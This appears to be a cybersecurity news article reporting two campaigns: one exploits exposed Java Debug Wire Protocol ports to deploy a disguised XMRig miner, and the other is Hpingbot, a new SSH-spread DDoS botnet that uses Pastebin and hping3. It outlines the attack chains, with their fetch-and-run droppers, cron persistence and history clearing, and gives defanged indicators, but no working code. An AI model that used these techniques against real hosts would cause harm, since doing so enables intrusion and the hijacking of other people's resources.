Threat actors are weaponizing exposed Java Debug Wire Protocol (JDWP) interfaces to obtain code execution capabilities and deploy cryptocurrency miners on compromised hosts.
“The attacker used a modified version of XMRig with a hard-“coded configuration, allowing them to avoid suspicious command-line arguments that are often flagged by defenders,” Wiz researchers Yaara Shriki and Gili Tikochinski said in a report published this week. “The payload used mining pool proxies to hide their cryptocurrency wallet address, thereby preventing investigators from pivoting on it.”
The cloud security firm, which is being acquired by Google Cloud, said it observed the activity against its honeypot servers running TeamCity, a popular continuous integration and continuous delivery (CI/CD) tool.
JDWP is a communication protocol used in Java for debugging purposes. With JDWP, users can leverage a debugger to work in a different process, a Java application, on the same computer, or on a remote computer.
But given that JDWP lacks authentication or access control mechanisms, exposing the service to the internet can open up a new attack vector that attackers can abuse as an entry point, enabling full control over the running Java process.
Simply put, the misconfiguration can be utilized to inject and execute arbitrary commands in order to set up persistence on and ultimately run malicious payloads.
“While JDWP is not enabled by default in most Java applications, it is commonly used in development and debugging environments,” Wiz said. “Many popular applications automatically start a JDWP server when run in debug mode, often without making the risks obvious to the developer. If improperly secured or left exposed, this can open the door to remote code execution (RCE) vulnerabilities.”
Some of the applications that may launch a JDWP server when in debug mode include TeamCity, Jenkins, Selenium Grid, Elasticsearch, Quarkus, Spring Boot, and Apache Tomcat.
Data from GreyNoise shows more than 2,600 IP addresses scanning for JDWP endpoints within the last 24 hours, out of which over 1,500 IP addresses are malicious and 1,100 IP addresses are classified as suspicious. The vast majority of these IP addresses originate from China, the United States, Germany, Singapore, and Hong Kong.
In the attacks observed by Wiz, threat actors take advantage of the fact that the Java Virtual Machine (JVM) listens for debugger connections on port 5005 to initiate scanning for open JDWP ports across the internet. In the next phase, a JDWP-Handshake request is sent to confirm if the interface is active and establish a JDWP session.
Once it’s confirmed that the service is exposed and interactive, the attackers move to execute a curl command to fetch and execute a dropper shell script that performs a series of actions –
- Kill competing miners or any high‐CPU processes
- Drop a modified version of XMRig miner for the appropriate system architecture from an external server (“awarmcorner[.]world”) into “~/.config/logrotate”
- Establish persistence by setting cron jobs to ensure that payload is re-fetched and re-executed after every shell login, reboot, or a scheduled time interval
- Delete itself on exit
“Being open-source, XMRig offers attackers the convenience of easy customization, which in this case involved stripping out all command-line parsing logic and hardcoding the configuration,” Wiz said. “This tweak not only simplifies deployment but also allows the payload to mimic the original logrotate process more convincingly.”
New Hpingbot Botnet Emerges
A notable aspect of the malware is that unlike other trojans that are typically derived from known botnet malware families like Mirai and Gafgyt, Hpingbot is an entirely new strain. At least since June 17, 2025, a few hundred DDoS instructions have been issued, with Germany, the United States, and Turkey being the main targets.
“This is a new botnet family built from scratch, showing strong innovation capabilities and efficiency in using existing resources, such as distributing loads through the online text storage and sharing platform Pastebin and launching DDoS attacks using the network testing tool hping3, which not only improves stealth but also significantly reduces development and operating costs,” the Chinese cybersecurity company said.
Hpingbot primarily takes advantage of weak SSH configurations, propagated by means of an independent module that carries out password spraying attacks to obtain initial access to systems.
The presence of German debugging comments in the source code likely indicates that the latest version may be under testing. The attack chain, in a nutshell, involves using Pastebin as a dead drop resolver to point to an IP address (“128.0.118[.]18”) that, in turn, is employed to download a shell script.
The script is then used to detect the CPU architecture of the infected host, terminate an already running version of the trojan, and retrieve the main payload that’s responsible for initiating DDoS flood attacks over TCP and UDP. Hpingbot is also designed to establish persistence and cover up traces of infection by clearing the command history.
In an interesting twist, attackers have been observed using nodes controlled by Hpingbot to deliver another Go-based DDoS component as of June 19 that, while relying on the same command-and-control (C2) sever, eschews Pastebin and hping3 calls for built-in flood attack functions based on UDP and TCP protocols.
Another aspect worth mentioning is that although the Windows version cannot use hping3 to launch DDoS attacks due to the fact that the tool is installed using the Linux command “apt -y install,” the ability of the malware to drop and execute additional payloads hints at the possibility that the threat actors intend to go beyond service disruption to turn it into a payload distribution network.
“It is worth noting that the Windows version of Hpingbot cannot directly call hping3 to launch DDoS attacks, but its activity is just as frequent, indicating that attackers are not only focusing on launching DDoS, but are more likely to focus on its function of downloading and executing arbitrary payloads.”
